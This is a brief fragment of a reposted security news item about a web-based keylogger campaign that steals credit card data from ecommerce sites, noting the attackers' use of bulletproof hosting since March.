types of attacks are on the rise. Since March the threat actors behind this most recent campaign have grown more sophisticated; opting to use bulletproof hosting services and attacking a wider range of ecommerce platforms.

Source:https://threatpost.com

KNOWLEDGE BELONGS TO THE WORLD

The post WEB-BASED KEYLOGGER USED TO STEAL CREDIT CARD DATA FROM POPULAR SITES appeared first on Information Security Newspaper.